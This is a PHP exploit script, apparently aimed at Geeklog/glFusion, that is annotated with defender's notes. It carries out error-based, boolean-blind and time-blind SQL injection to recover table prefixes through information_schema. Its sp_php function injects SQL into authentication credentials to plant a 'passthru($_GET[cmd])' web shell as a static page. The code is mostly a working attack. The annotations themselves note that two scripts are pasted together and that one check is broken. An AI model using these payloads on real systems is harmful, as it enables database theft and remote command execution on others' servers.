/**
 * Error-based probe for the preferences handler.
 *
 * Posts a single unbalanced ")" in the `blocks[0]` preference field through the
 * request helper _s (defined elsewhere in this file) and treats a database error
 * in the response, as judged by chk_err (also defined elsewhere), as the
 * "vulnerable" signal. Calls die() when no error is detected, so nothing after
 * this function runs in that case.
 *
 * Defender's notes: the probe only works if the field reaches the SQL layer
 * without parameter binding AND the resulting error text is echoed back to the
 * client. Prepared statements remove the first condition; not displaying DB
 * errors in production removes the oracle. In logs this shows up as a
 * mode=savepreferences request whose blocks[0] value is a lone %29.
 *
 * Globals declared: $host, $port, $path, $cookies, $url, $prefix. Only $url,
 * $cookies and $prefix are used in this body.
 */
function run_test()
{
    global $host, $port, $path, $cookies, $url, $prefix;
    // The probe value: one stray closing parenthesis, URL-encoded into the body below.
    $_sql = ")";
    $out = _s($url, $cookies, 1, "mode=savepreferences&" . $prefix . "blocks[0]=" . urlencode($_sql) . "&");
    if (chk_err($out)) {
        print "[*] Vulnerable!\n";
    } else {
        // Hard exit rather than return; presumably the rest of the script assumes this probe succeeded.
        die("[!] Not vulnerable ...");
    }
}
/**
 * Blind, boolean-based recovery of the table-name prefix through the `order`
 * field posted to search.php.
 *
 * For each character position $j the inner loop binary-searches the ASCII value
 * of SUBSTR(TABLE_NAME FROM $j FOR 1) for the first information_schema table
 * whose name matches the hex literal 0x25747261636b6261636b636f646573, which
 * decodes to "%trackbackcodes". The oracle is the first link extracted from the
 * response (xtrct_lnk, defined elsewhere) compared with $_lnks[0]: equal means
 * the CASE expression took the THEN branch ($v[0]), otherwise the ELSE branch
 * ($v[1]). The outer loop stops once a chr(0) has been appended (presumably the
 * position is past the end of the name, so ASCII() yields 0 — confirm against
 * the DB semantics). The literal suffix "trackbackcodes" is then stripped and the
 * remaining prefix returned.
 *
 * Calls die() if chk_err reports a DB error on the first query of a step; the
 * message interprets that as information_schema being unavailable.
 *
 * Defender's notes: a sort expression assembled from request input is the
 * injection point; restricting `order` to a fixed allow-list of column names
 * closes it. The traffic is distinctive — a burst of search.php requests whose
 * `order` value contains CASE/SELECT/information_schema — and is easy to alert on.
 *
 * Globals read: $_lnks, $v, $type, $host, $port, $path, $prepend.
 * NOTE(review): a second function named find_prefix appears later in this file;
 * PHP refuses to redeclare a function, so the two bodies most likely come from
 * two separate scripts pasted together.
 *
 * @return string the recovered prefix (may be empty)
 */
function find_prefix()
{
    global $_lnks, $v, $type, $host, $port, $path, $prepend;
    $_table_name = "";
    $j = 1;
    print "[*] Table name -> ";
    // One outer iteration per character; ends when the recovered character is NUL.
    while (!strstr($_table_name, chr(0))) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            // Integer floor of the midpoint: round() rounds .5 upward, hence the -1 for odd sums.
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            // Query 1 of a step: is the character code >= $c ?
            $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) >= " . $c . ") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
            $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
            $_d = "order=" . $sql . ";";
            // NOTE(review): _s is called with two arguments here but with four in
            // run_test/sp_php; the helper's signature is outside this view.
            $_o = _s($url, $_d);
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable!");
            }
            $l = xtrct_lnk($_o);
            // THEN branch observed => code is >= $c, so the lower bound moves up.
            if ($l == $_lnks[0]) {
                $mn = $c;
            } else {
                $mx = $c - 1;
            }
            // At most two candidates left: one equality query settles the character.
            if ($mx - $mn == 1 or $mx == $mn) {
                $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) = " . $mn . ") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
                $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
                $_d = "order=" . $sql . ";";
                $_o = _s($url, $_d);
                // No chk_err guard on this second query, unlike the first one above.
                $l = xtrct_lnk($_o);
                if ($l == $_lnks[0]) {
                    print chr($mn);
                    $_table_name .= chr($mn);
                } else {
                    print chr($mx);
                    $_table_name .= chr($mx);
                }
                break;
            }
        }
        $j++;
    }
    print "\n";
    // The matched table is "<prefix>trackbackcodes"; drop the fixed part.
    $_prefix = str_replace("trackbackcodes", "", $_table_name);
    return $_prefix;
}
/**
 * Creates a static page through the Atom webservices endpoint
 * (webservices/atom/index.php?plugin=staticpages) with <sp_php> set to 1.
 *
 * Builds an Atom <entry> whose <sp_content> is the string in $sh and posts it
 * via _s with a base64-encoded "user:password" pair (presumably HTTP Basic
 * authentication — confirm in _s). The user part is not a plain account name:
 * it carries an SQL fragment ("... users LIMIT 1/*") appended to the table
 * prefix, and the leading "******" looks like a redaction in this copy of the
 * script rather than a literal value.
 *
 * Defender's notes: two independent controls are implied by this code. The
 * username supplied for authentication must be bound as a query parameter, not
 * concatenated; and <sp_php> must only be honoured for accounts that hold the
 * staticpages.PHP permission (the original author's comment below states the
 * server resets it to 0 otherwise). Requests to this endpoint whose credentials
 * decode to SQL keywords are a clear detection signal.
 *
 * Globals declared: $host, $port, $path, $pwd, $prefix, $uid ($uid is unused here).
 */
function sp_php()
{
    global $host, $port, $path, $pwd, $prefix, $uid;
    // Random page id; rand() is not cryptographic, but only uniqueness matters here.
    srand(make_seed());
    $id = rand(0x1, 0xffffff);
    echo "[*] id->" . $id . "\n";
    // Page body. With <sp_php>1</sp_php> the server would treat it as PHP, which is
    // exactly why the permission check mentioned below has to hold.
    $sh = "passthru(\$_GET[cmd]);";
    // Always specify the namespace URI on every element.
    // If the staticpages.PHP permission is not available, sp_php is reset to 0 server-side.
    $data = "<?xml version=\"1.0\"?>" . "<entry>" . "<title term=\"1\" xmlns=\"http://www.geeklog.net/xmlns/app/gl\"> </title>" . "<id xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$id}</id>" . "<sp_content xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$sh}</sp_content>" . "<sp_php xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>" . "<gl_etag xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>" . "</entry>";
    $usr = "******" . $prefix . "users LIMIT 1/*";
    $url = "http://{$host}:{$port}" . $path . "webservices/atom/index.php?plugin=staticpages";
    $out = _s($url, base64_encode($usr . ":" . $pwd), 1, $data);
    // NOTE(review): $_o is never assigned in this function — the response is in
    // $out — so this check always inspects null and the "Done" branch is taken
    // regardless of what the server answered.
    if (chk_err($_o)) {
        print "[*] Sql error.";
    } else {
        print "[*] Done! Visit->http://{$host}:{$port}" . $path . "staticpages/index.php?page={$id}&cmd=ls%20-la";
    }
}
/**
 * Blind, time-based recovery of the table prefix through the glf_session cookie.
 *
 * Same binary search per character as the boolean variant earlier in this file,
 * but the oracle is latency: the CASE expression evaluates {$delayfunc} (a global;
 * presumably a SLEEP/BENCHMARK-style expression — confirm) in its THEN branch, and
 * a wall-clock difference greater than $n - 1 seconds is read as "true". time()
 * has one-second granularity, which is why the threshold is $n - 1 rather than $n.
 *
 * Positions are walked backwards: $j starts at -15 and decrements. The matched
 * table name ends in the 14-character literal "trackbackcodes" (hex
 * 0x25747261636b6261636b636f646573 = "%trackbackcodes"), so -15 is presumably the
 * last character of the prefix if SUBSTR counts negative positions from the end
 * (MySQL semantics — confirm). Each recovered character is prepended; a recovered
 * code of 0 sets $null_f and ends the outer loop.
 *
 * login() (defined elsewhere) is called before every request to obtain a fresh
 * session id; die() is called if chk_err flags a DB error on the first query.
 *
 * Defender's notes: the session identifier taken from the cookie is concatenated
 * into SQL. Validating it against its expected format (fixed length, restricted
 * alphabet) before any lookup, and binding it as a parameter, removes the
 * injection point; cookies containing SQL keywords and long runs of requests with
 * ~$n-second latency are the detection signals.
 *
 * NOTE(review): $null_f is read by the outer while before it is ever assigned,
 * so the loop relies on an undefined variable evaluating to null (a warning in
 * PHP 8). NOTE(review): this redeclares find_prefix from earlier in the file,
 * which PHP rejects — the two are very likely separate scripts.
 *
 * Globals read: $host, $port, $path, $delayfunc, $_user, $_pwd, $n
 * ($_user and $_pwd are not used in this body).
 *
 * @return string the recovered prefix (may be empty)
 */
function find_prefix()
{
    global $host, $port, $path, $delayfunc, $_user, $_pwd, $n;
    $_tn = "TABLE_NAME"; // original author: "case important ??"
    $_ift = "information_schema.TABLES"; // original author: "??"
    $_table_prefix = "";
    $j = -15;
    print "[*] Initiating table prefix extraction...\n";
    // One outer iteration per character, walking leftwards; $null_f is set on a NUL.
    while (!$null_f) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            // Integer floor of the midpoint: round() rounds .5 upward, hence the -1 for odd sums.
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            $sessid = login();
            // Query 1 of a step: delay only if the character code is >= $c.
            $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) >= " . $c . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
            $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
            $url = "http://{$host}:{$port}" . $path;
            $starttime = time();
            $_o = _s($url, $cookies, 0, "");
            $endtime = time();
            $difftime = $endtime - $starttime;
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable! MySQL < 5.0");
            }
            // Observed delay => THEN branch => code is >= $c.
            if ($difftime > $n - 1) {
                $mn = $c;
                // Pause after a positive result, presumably so a still-running delayed
                // query on the server does not skew the timing of the next probe.
                sleep($n);
            } else {
                $mx = $c - 1;
            }
            // At most two candidates left: one equality query settles the character.
            if ($mx - $mn == 1 or $mx == $mn) {
                $sessid = login();
                $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) = " . $mn . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
                $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
                $url = "http://{$host}:{$port}" . $path;
                $starttime = time();
                $_o = _s($url, $cookies, 0, "");
                $endtime = time();
                $difftime = $endtime - $starttime;
                // No chk_err guard on this second query, unlike the first one above.
                if ($difftime > $n - 1) {
                    if ($mn != 0) {
                        // Characters are recovered right-to-left, so prepend.
                        $_table_prefix = chr($mn) . $_table_prefix;
                    } else {
                        // Code 0: ran off the start of the name; stop after this step.
                        $null_f = true;
                    }
                } else {
                    $_table_prefix = chr($mx) . $_table_prefix;
                }
                if (!$null_f) {
                    print "[?] Table prefix->[??]" . $_table_prefix . "\n";
                }
                sleep($n);
                break;
            }
        }
        $j--;
    }
    print "[?] Table prefix->" . $_table_prefix . "\n";
    return $_table_prefix;
}